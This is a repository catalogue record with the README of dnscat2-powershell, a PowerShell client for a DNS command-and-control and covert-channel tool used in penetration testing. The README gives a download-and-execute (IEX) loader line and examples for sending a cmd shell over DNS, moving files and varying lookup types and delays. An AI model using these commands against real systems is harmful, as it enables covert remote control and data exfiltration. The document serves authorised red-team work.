{"id":13540101,"url":"https://github.com/lukebaggett/dnscat2-powershell","last_synced_at":"2025-04-02T06:32:04.178Z","repository":{"id":24711262,"uuid":"28122958","full_name":"lukebaggett/dnscat2-powershell","owner":"lukebaggett","description":"A Powershell client for dnscat2, an encrypted DNS command and control tool.","archived":true,"fork":false,"pushed_at":"2023-08-22T03:20:46.000Z","size":1050,"stargazers_count":392,"open_issues_count":5,"forks_count":120,"subscribers_count":19,"default_branch":"master","last_synced_at":"2024-11-03T05:32:26.320Z","etag":null,"topics":["penetration-testing","powershell","security"],"latest_commit_sha":null,"homepage":"https://github.com/iagox86/dnscat2","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lukebaggett.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2014-12-17T05:38:41.000Z","updated_at":"2024-10-01T15:16:16.000Z","dependencies_parsed_at":"2024-01-12T03:36:26.634Z","dependency_job_id":"a56e2b20-ac3b-41c2-9fe4-3f6b95576b0b","html_url":"https://github.com/lukebaggett/dnscat2-powershell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-powershell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-powershell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-powershell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lukebaggett%2Fdnscat2-powershell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lukebaggett","download_url":"https://codeload.github.com/lukebaggett/dnscat2-powershell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246768364,"owners_count":20830653,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["penetration-testing","powershell","security"],"created_at":"2024-08-01T09:01:40.336Z","updated_at":"2025-04-02T06:32:03.294Z","avatar_url":"https://github.com/lukebaggett.png","language":"PowerShell","funding_links":[],"categories":["\u003ca id=\"7485e724ef5efd1daf9d672bd72fb595\"\u003e\u003c/a\u003eDNS协议","\u003ca id=\"a76463feb91d09b3d024fae798b92be6\"\u003e\u003c/a\u003e侦察\u0026\u0026信息收集\u0026\u0026子域名发现与枚举\u0026\u0026OSINT","扫描器、资产收集、子域名"],"sub_categories":["\u003ca id=\"d70a62f77fa20a2219e81fa61527e644\"\u003e\u003c/a\u003e工具","\u003ca id=\"a695111d8e30d645354c414cb27b7843\"\u003e\u003c/a\u003eDNS","网络服务_其他"],"readme":"[dnscat2](https://github.com/iagox86/dnscat2) is a DNS covert channel tool by [@iagox86 (Ron Bowes)](https://blog.skullsecurity.org/) which is used to transfer data over DNS requests.\n\nThis is a powershell version of the dnscat2 C client.\n\n[Click here for a blog post](http://www.blackhillsinfosec.com/?p=5578) that gives a more detailed breakdown of the purpose of this script, and how to use it.\n\nTo use this script, you'll need the ruby [dnscat2 server](https://github.com/iagox86/dnscat2). **Make sure to add the `--no-cache` option when running the server. This client is incompatible with the server's caching.**\n\n### Setup\n\n[First, install the dnscat2 server.](https://github.com/iagox86/dnscat2/blob/master/README.md) Start the server with caching disabled using `--no-cache`. The command to start your server should look something like this: `ruby dnscat2.rb --dns=\"domain=example.com\" --no-cache`\n\nNext, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:\n\n    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')\n\n### Examples\n\nStart-Dnscat2 is the actual function used as the client. Specifiy the dnscat2 server using `-Domain`.\n\n    Start a command session, and send DNS requests to 8.8.8.8 on port 53:\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -DNSServer 8.8.8.8\n\n    Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -Exec cmd\n\n    Start a console session. Only use CNAME, MX, and AAAA requests:\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -LookupTypes @(\"CNAME\",\"MX\",\"AAAA\") -Console\n\n    Do not encrypt the session. Encryption is enabled by default.\n        Start-Dnscat2 -Domain \u003cdnscat2 server\u003e -NoEncryption\n\n### Powershell Command Session Commands\n\nThe client can handle normal dnscat2 commands, or the *powershell version* of that command. To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):\n\n    Start a new session which simulates a Powershell shell, like ExecPS:\n        exec psh\n\n    Upload app.exe on the server into a hex string stored in the $app powershell variable:\n        upload app.exe hex:$app\n    \n    Download the byte array stored in the $app powershell variable to app.exe on the server:\n        download bytes:$app app.exe\n\n### Start-Dnscat2\n\n    -Domain \u003cString\u003e          The Domain being used by the dnscat2 server.\n    -DNSServer \u003cString\u003e       The hostname or IP Address to send DNS queries to. (Default: Set by Windows)\n    -DNSPort \u003cInt32\u003e          The port to send DNS queries to. (Default: 53)\n    \n    -Command                  Start a command session. (Default)\n    -Exec \u003cString\u003e            Link the I/O of a process with the Dnscat2 session.\n    -Console                  Link the I/O of the console with the Dnscat2 session.\n    -ExecPS                   Simulate a Powershell session and link the IO with the Dnscat2 session.\n                              WARNING: Exiting will kill the entire dnscat2 client, not just the session.\n    \n    -PreSharedSecret          Set the same secret on the server to authenticate and prevent MITM.\n    -NoEncryption             Do not use encryption.\n    \n    -LookupTypes \u003cString[]\u003e   Set an array of lookup types to randomly switch between.\n                              Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)\n    -Delay \u003cInt32\u003e            Set a delay between each request, in milliseconds. (Default: 0)\n    -MaxRandomDelay \u003cInt32\u003e   Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)\n    -MaxPacketSize \u003cInt32\u003e    Maximum length of a dnscat2 packet. (Default: 240)\n    -Name \u003cString\u003e            The name of your dnscat2 session. (Default: hostname)\n\n### ExecPS and 'exec psh'\n\ndnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. **Watch out** for things that exit powershell like \"exit\" and \"break\", because the entire dnscat2-powershell client will exit, not just the ExecPS session.\n\n### Other Credits\n\n* [db9 on stackoverflow's](https://stackoverflow.com/users/6866918/db9) [demonstration of BouncyCastle ECDH.](http://stackoverflow.com/a/39662164)\n* [FrankSpierings's](https://github.com/FrankSpierings) implementation of [Salsa20](https://gist.github.com/FrankSpierings/c18da658e06948313fff) and [Sha3](https://gist.github.com/FrankSpierings/3577b0365d02df6f7eeb) in Powershell via C#.\n* [Rebex Labs stripped down version of the BouncyCastle DLL for ECC.](http://labs.rebex.net/curves)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukebaggett%2Fdnscat2-powershell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flukebaggett%2Fdnscat2-powershell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukebaggett%2Fdnscat2-powershell/lists"}